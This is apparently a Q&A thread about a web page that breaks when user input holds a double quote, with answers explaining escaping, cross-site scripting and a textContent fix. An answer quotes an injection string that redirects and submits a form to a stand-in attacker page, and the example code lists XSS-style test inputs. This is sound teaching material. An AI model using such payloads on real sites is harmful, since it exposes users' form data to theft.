I am not sure I am going to be able to explain this one right, as it may be difficult for me to explain, but I am going to try.
I have a web form which publishes the data to an XML file, then it shows the data in another web page.
Everything works fine, but when the user types a double quote character, at the time the web page tries to display the data it crashes due to the double quote symbol, which makes sense as it may be considered an unfinished string by JavaScript.
There is also something worth mentioning, and that is that the problem only occurs in a section of the form, which consists of a table that is populated with an array created based on a collection of elements from the XML; the text from the array is then inserted into the table cells using innerHTML.
eg.
XML
<node1>
<node2> test "1</node2>
</node1>
<script type="text/javascript">
// the " inside the value ends the string literal early, so the statement is a syntax error
alert("<xsl:value-of select="node1/node2"/>");
</script>
This will not work; maybe if I get a workaround for this, I can fix the rest.
Sorry guys if I have not explained myself well enough; I don't know how to expose this problem any better. I would be happy to answer any questions if you need it.
Please note that if any of you have an answer, it has to be JavaScript, no jQuery.
Thanks.
Always escape user input. Your bug is a benign example of the problems that can occur, but it means you’re also probably vulnerable to a code injection attack, such as cross-site scripting.
Escaping
Here’s what Wikipedia has to say about escaping. Here’s an overly-simplified example of what it means. Assume that you have the following JavaScript and that I haven’t made any silly errors in it (since I just made it up):
What happens if the user types in something like '); document.forms[0].action="http://www.example.com/maliciousPage.html";document.forms[0].submit();"? Suddenly, your alert causes the form (which might contain sensitive data) to be submitted to an attacker’s page. This is obviously a problem. You should have some library code somewhere that escapes the value before you attempt to alert it. This will do things like putting slashes in front of quotes, etc. Also, you probably shouldn’t try to write such code yourself, since escaping logic is always at least 10 times harder than you think it will be. You should definitely be getting logic like this from a library somewhere.
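As an added illustration of the escaping the answer describes, applied to the questioner's alert()-in-XSLT and innerHTML cases (example code, not from the question, the answer, or any library): the function names, the sample values and the plain object standing in for a table cell are all constructed here.

```javascript
// Escape a value for use inside a double-quoted JavaScript string literal that a
// template (e.g. an XSLT stylesheet) writes into a <script> block. Backslash must
// be handled first; '<' and '>' are escaped so the value can never contain a
// literal "</script>" that would end the script element early.
function escapeForJsString(value) {
  return String(value)
    .replace(/\\/g, "\\\\")
    .replace(/"/g, '\\"')
    .replace(/'/g, "\\'")
    .replace(/\n/g, "\\n")
    .replace(/\r/g, "\\r")
    .replace(/\u2028/g, "\\u2028") // line separators are line terminators in JS source
    .replace(/\u2029/g, "\\u2029")
    .replace(/</g, "\\u003C")
    .replace(/>/g, "\\u003E");
}

// The statement the question's stylesheet emits, with the value escaped.
// (JSON.stringify covers the same cases except '<' and '>'.)
function buildAlertStatement(value) {
  return 'alert("' + escapeForJsString(value) + '");';
}

// Check that the generated statement parses and that the value round-trips
// intact: the statement is compiled with a stub alert() that captures its argument.
function roundTrip(value) {
  let captured;
  new Function("alert", buildAlertStatement(value))((v) => { captured = v; });
  return captured;
}

// Constructed samples: the questioner's input, then strings shaped like the
// answer's injection example and like a premature script-close.
const samples = [
  'test "1',
  '"); document.forms[0].submit(); ("',
  "</script><script>alert(1)</script>",
];

// For the innerHTML part of the question: assigning textContent creates a text
// node, so quotes and tags in user data are displayed, never parsed.
// `cell` is any object with a textContent property (a real <td> in the browser).
function fillCell(cell, value) {
  cell.textContent = value;
  return cell.textContent;
}
```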